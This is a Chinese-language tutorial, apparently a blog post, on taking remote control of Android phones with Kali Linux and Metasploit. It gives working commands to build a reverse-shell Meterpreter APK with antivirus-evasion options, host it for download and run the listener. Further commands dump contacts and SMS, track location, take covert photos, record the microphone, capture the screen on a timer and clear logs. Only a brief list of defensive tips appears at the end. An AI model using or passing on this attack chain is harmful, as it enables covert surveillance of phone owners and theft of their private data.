1. 环境准备与工具配置在开始远程操控安卓设备之前我们需要准备好必要的工具和环境。Kali Linux作为渗透测试的瑞士军刀内置了丰富的工具链其中Metasploit Framework是实现远程控制的核心工具。我建议使用最新版的Kali系统虽然老版本也能运行但新版本对硬件兼容性更好特别是无线网卡驱动支持更完善。首先确保你的Kali系统已经更新到最新状态。打开终端输入以下命令sudo apt update sudo apt upgrade -y接下来安装必要的依赖包。有些同学可能会忽略这一步导致后续操作报错。我遇到过好几次因为缺少依赖而无法生成有效payload的情况sudo apt install apache2 metasploit-framework -y关键点在于网络环境配置。你的Kali机器和目标安卓设备需要处于同一局域网内。我习惯使用USB无线网卡创建一个热点这样既能隔离测试环境又能确保网络稳定性。用ifconfig命令查看本机IP时注意要记录wlan0接口的地址而不是eth0的。曾经有次我搞混了接口折腾半天才发现问题所在。2. 生成定制化APK文件制作安卓端payload是整个过程中最关键的环节。很多新手会直接复制网上的命令但这样生成的APK很容易被杀毒软件拦截。经过多次测试我发现通过以下参数组合可以显著提高免杀率msfvenom -p android/meterpreter/reverse_tcp LHOST192.168.1.100 LPORT443 -e x86/shikata_ga_nai -i 3 -k --platform android -a dalvik -o Test.apk这里有几个实用技巧使用443端口而不是随机高位端口因为企业防火墙通常允许443端口的出站流量添加shikata编码(-e参数)并迭代3次(-i参数)能有效绕过基础特征检测-k参数会在原始APK外层添加一个保护壳生成APK后我习惯用apktool解包检查apktool d Test.apk查看AndroidManifest.xml中的权限声明是否合理特别是摄像头、位置等敏感权限需要正确声明。3. 搭建简易分发服务器把APK文件放到web服务器上时有几点安全注意事项不要使用默认的/var/www/html路径可以新建一个专用目录修改文件权限为644避免被篡改最好配置HTTPS而不是HTTP现代安卓系统会警告不安全的下载这是我的标准操作流程sudo mkdir /var/www/apk_download sudo cp Test.apk /var/www/apk_download/ sudo chmod 644 /var/www/apk_download/Test.apk sudo systemctl start apache2如果目标设备无法下载可能是SELinux策略限制。这时候可以临时设置sudo setenforce 0或者更安全的方法是添加新的策略规则。4. 建立Meterpreter会话配置监听器时最容易出错的就是payload类型和参数的匹配。我建议先完整执行以下步骤msfconsole use multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 443 set ExitOnSession false run -j重要提示在真实环境中我通常会添加自动迁移进程的脚本防止会话因为应用崩溃而断开。可以通过resource脚本实现cat migration.rc EOF post/android/manage/migrate EOF msfconsole -r migration.rc当会话建立后先用sysinfo命令确认连接状态。我习惯先检查目标设备的安卓版本因为不同版本的系统API差异很大。5. 信息取证实战操作获取通讯录是最常见的需求但直接使用dump_contacts可能会漏掉某些特殊格式的联系人。我的标准流程是dump_contacts app_list dump_sms对于地理位置信息有几种获取方式通过geolocate命令获取粗略定位使用wlan_geolocate通过WiFi热点定位调用API直接获取GPS数据需要设备开启定位服务拍照取证时要注意webcam_list webcam_snap -i 1 -v false-v参数控制是否在目标设备显示预览取证时建议设为false。遇到摄像头无法启动的情况可能是权限问题可以尝试先执行shell命令然后手动授权。6. 高级监控技巧除了基础功能Meterpreter还支持一些高级监控后台录音record_mic -d 60 -f /tmp/audio.mp3屏幕截图screengrab实时屏幕监控stream_screen -q 80对于需要持续监控的场景我建议设置自动脚本cat auto.rc EOF screengrab -p /tmp/ss webcam_snap -p /tmp/cam dump_contacts -f /tmp/contacts.txt EOF然后定时执行run -j -f auto.rc -t 300每300秒自动执行一次信息收集。7. 痕迹清理与防护建议完成测试后必须清理痕迹。我总结了一套完整的清理流程删除APK文件shell pm uninstall com.metasploit.stage清除日志clearev恢复系统设置shell settings put global adb_enabled 0对于防御方我建议采取以下防护措施禁用未知来源应用安装定期检查设备管理员应用列表监控异常网络连接使用硬件级安全芯片的设备在实际测试中我发现Android 10以上版本由于Scoped Storage的限制取证难度明显增加。这时候需要结合ADB调试等辅助手段但那就需要物理接触设备了。
)
